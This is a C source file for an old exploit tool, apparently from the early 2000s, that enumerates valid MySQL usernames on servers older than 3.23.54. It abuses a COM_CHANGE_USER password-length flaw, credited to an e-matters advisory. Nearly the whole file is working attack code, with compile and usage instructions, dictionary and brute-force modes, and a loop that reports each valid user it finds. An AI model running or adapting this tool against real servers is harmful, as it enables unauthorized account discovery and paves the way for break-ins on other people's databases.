/* Unpatched MySql < 3.23.54 COM_CHANGE_USER password length user discover :D
 *
 * Discovered by e-matters
 *  Advisory: http://security.e-matters.de/advisories/042002.html
 *
 * Usage: mysqlgetusers "host" "valid_user" "valid_pass"
 * dreyer <dreyer@subdimension.com>
 * Version 0.2 
 * 
 * What you need:
 * A valid user loginable from this host
 * Password for that user
 * A dictionary
 *
 * Compile: gcc -o mysqlgetusers mysqlgetusers.c -lmysqlclient
 * i.e.:
 * ./mysqlgetusers -i localhost my_user my_pass 
 *
 * Greetings to: jaxp, kicat, and all people in #ngsec @ irc-hispano network
 */

#include <stdio.h>
#include <stdlib.h>
#include <mysql/mysql.h>
#include <getopt.h>
#include <signal.h>

char *charset="abcdefghijklmnopqrstuvwxyz";
char *last;
FILE *dict;

void *sig_hand (int j) {
   printf("[-] Aborting... Last Checked user: '%s'\n",last);
   exit(-1);
}

int next_token (char *in) {
    int i,j=strlen(in)-1; 
    char *k,*l=charset+strlen(charset)-1;
    if (j<0) { 
        in[0]=*charset; 
        return 1;
    }
    for(i=j;i>=0;i--) {
        k=index(charset,in[i]);
        if (k==l) { 
          if(i==0) { 
           printf("[+] Trying users with %d characters\n",j+2);
           memset(in,charset[0],j+2);
           in[j+2]=0;
           break;
          } else in[i]=*charset;
         }
         else { 
          in[i]=*(k+1);
          break;
         }
    }
}

int next_user (char *in,int type) {
  if (type==1) {
    if (feof(dict)) return 0;
    fgets(in,80,dict);
    in[strlen(in)-1]=0;
    return 1;
  } else {
    next_token(in);
    return 1;
  }
}

int prepare_dict (char *a)
{
   char search[300];
   while(!feof(dict)) {
    fgets(search,80,dict);
    if (!strncmp(search,a,strlen(a))) return 1;
   }
   printf("[-] Sorry %s not found in dictfile\n");
   exit(-1);
}

int main(int argc, char **argv)
{
  MYSQL *sock,mysql;
  char abuf[1000];

  char  *pass;
  int i,opt,type=0;
  
  printf("[+] MySql <3.23.54 User Discovery by \033[1;33mdreyer@subdimension.com\033[0m\n");
  if (argc < 5)
  {
    fprintf(stderr,"usage : mysqlusers [ -c charset ] [ -f <dict_file> | -i ] [ -r first_pass ] host user pass\n");
    exit(1);
  }
  last=abuf;
  memset (abuf,0,sizeof(abuf));
  while((opt=getopt(argc,argv,"c:f:ir:"))!=EOF)
  switch(opt) {
      case 'c':
               charset=optarg;
	       break;
      case 'f':
               type=1;
               if ((dict=fopen(optarg,"r"))==NULL) {
                  perror("Dictfile\n");
                  exit(1);
               }
	       break;
      case 'i':
	       type=2;
	       break;
      case 'r': 
               strcpy(abuf,optarg);
               break;

  }
  signal(SIGINT,sig_hand);
  argv=&argv[optind-1];
  if(!type) {
      printf("[-] Provide one attack method please...\nAborting\n");
      exit(1);
  }

  if (abuf[0] && type==1) prepare_dict(abuf);

  printf("[+] Conecting...\n");
  mysql_init(&mysql);
  if (!(sock = mysql_real_connect(&mysql,argv[1],argv[2],argv[3],NULL,3306,NULL,0)))
  {
    fprintf(stderr,"[-] Couldn't connect to engine!\n%s\n",mysql_error(&mysql));
    exit(1);
  }
  printf("[+] Begining attack... Searching other valid users...\n");

  while(next_user(abuf,type)) {
    pass=abuf+strlen(abuf)+1;
    strcpy(pass,"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");
    net_clear(&sock->net);
    if (net_write_command(&sock->net,COM_CHANGE_USER, abuf,strlen(abuf)+strlen(pass)+2)) 
    {
         printf("[-] Can't send command to server.\n");
     }
    if (my_net_read(&sock->net)==packet_error)  {
       printf("[+] Found Valid user >%s<\n",abuf);
       sleep(1);
       if (!(sock = mysql_real_connect(&mysql,argv[1],argv[2],argv[3],NULL,3306,NULL,0)))
       {
           fprintf(stderr,"[-] Couldn't connect to engine!\n%s\n",
             mysql_error(&mysql));
           exit(1);
       }
    }
  }
  printf("[+] End\n");
  mysql_close(sock);
}
